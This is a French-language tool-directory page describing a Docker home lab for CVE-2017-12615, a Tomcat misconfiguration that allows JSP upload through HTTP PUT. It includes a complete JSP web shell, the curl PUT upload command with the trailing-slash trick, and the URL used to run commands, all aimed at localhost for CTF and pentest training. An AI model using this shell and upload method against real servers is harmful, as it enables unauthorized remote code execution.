Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2017-12615-Home-Lab — CVE-2017-12615 Tomcat : Exécution de code à distance via l'upload JSP — Home Lab pour le Red Teaming, les tests d'intrusion | Kitploit
Outils/GitHubGitHub/netw0rk7/cve-2017-12615-home-lab
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et ÉducationRed TeamingLabs et Pratique
GitHub
netw0rk7/cve-2017-12615-home-lab

CVE-2017-12615-Home-Lab

CVE-2017-12615 Tomcat : Exécution de code à distance via l'upload JSP — Home Lab pour le Red Teaming, les tests d'intrusion

Voir le dépôt
1il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

ANGLAIS CI-DESSOUS

CVE-2017-12615 Tomcat: Remote Code Execution via JSP Upload

image

Ce lab simule la vulnérabilité CVE-2017-12615 Tomcat: Remote Code Execution via JSP Upload
Elle est causée par la configuration readonly=false, qui permet de téléverser des fichiers via HTTP PUT, y compris des fichiers .jsp capables d'exécuter des commandes (RCE).


image

Fonctionnalités

  • Apache Tomcat 7.0.79 (vulnérable)
  • Override de DefaultServlet avec readonly=false
  • Téléversement PUT pour placer des fichiers .jsp dans le répertoire web ROOT
  • Prise en charge de l'exécution de commandes via un web shell
  • Page web de style industriel avec une note interne oubliée (indice)
  • Génération automatique de flag_RANDOM.txt à chaque démarrage du conteneur
  • Conçu pour les CTF / Red Team / formation au pentest

  • Structure des répertoires

    root@kitploit:~
    /opt/apache-tomcat-7.0.79/
    /opt/apache-tomcat-7.0.79/webapps/ROOT/index.jsp
    /opt/apache-tomcat-7.0.79/webapps/ROOT/WEB-INF/web.xml
    /tmp/flag_RANDOM.txt
    /docker-entrypoint.sh
    

    Utilisation (Lancer le conteneur)

    root@kitploit:~
    docker compose build
    docker compose up -d
    

    Ouvrir le site :

    root@kitploit:~
    http://localhost:8080/
    

    Comment tester la vulnérabilité CVE-2017-12615

    1) Créer le fichier payload JSP

    root@kitploit:~
    cat > shell.jsp << 'EOF'
    <%@ page import="java.io.*" %>
    <%
    String cmd = request.getParameter("cmd");
    if (cmd != null) {
        String s;
        Process p = Runtime.getRuntime().exec(cmd);
        BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
        while ((s = r.readLine()) != null) out.println(s + "<br>");
    }
    %>
    EOF
    

    2) Téléverser le fichier avec PUT (le nom du fichier doit se terminer par /)

    root@kitploit:~
    curl -v -X PUT "http://localhost:8080/shell.jsp/"   -H "Content-Type: text/plain"   --data-binary @shell.jsp
    

    3) Utiliser le webshell

    root@kitploit:~
    http://localhost:8080/shell.jsp?cmd=id
    

    Flag

    Stocké dans :

    root@kitploit:~
    /tmp/flag_RANDOM.txt
    

    Version anglaise — CVE-2017-12615 Tomcat: Remote Code Execution via JSP Upload

    Ce lab simule CVE-2017-12615 Tomcat: Remote Code Execution via JSP Upload, où le DefaultServlet d'Apache Tomcat est mal configuré avec :

    root@kitploit:~
    readonly=false
    

    Cela permet aux attaquants de téléverser des fichiers .jsp via HTTP PUT, permettant ainsi une exécution de code à distance.


    image

    Fonctionnalités

    • Apache Tomcat 7.0.79 vulnérable
    • Override de DefaultServlet avec readonly=false
    • Téléversement PUT → écriture de fichiers .jsp arbitraires dans le répertoire web ROOT
    • Prend en charge l'exécution de commandes via un shell JSP
    • Page d'accueil de style industriel avec un indice interne subtil
    • flag_RANDOM.txt généré automatiquement au démarrage du conteneur
    • Adapté aux CTF, à la recherche et au développement d'exploits

    Exemple d'exploitation

    Téléverser un shell JSP

    root@kitploit:~
    curl -v -X PUT "http://localhost:8080/shell.jsp/"   -H "Content-Type: text/plain"   --data-binary @shell.jsp
    

    Exécuter des commandes

    root@kitploit:~
    http://localhost:8080/shell.jsp?cmd=id
    

    Emplacement du flag

    root@kitploit:~
    /tmp/flag_RANDOM.txt
    

    Avertissement

    À des fins éducatives, de recherche et de tests d'intrusion autorisés uniquement.

    Télécharger l’outil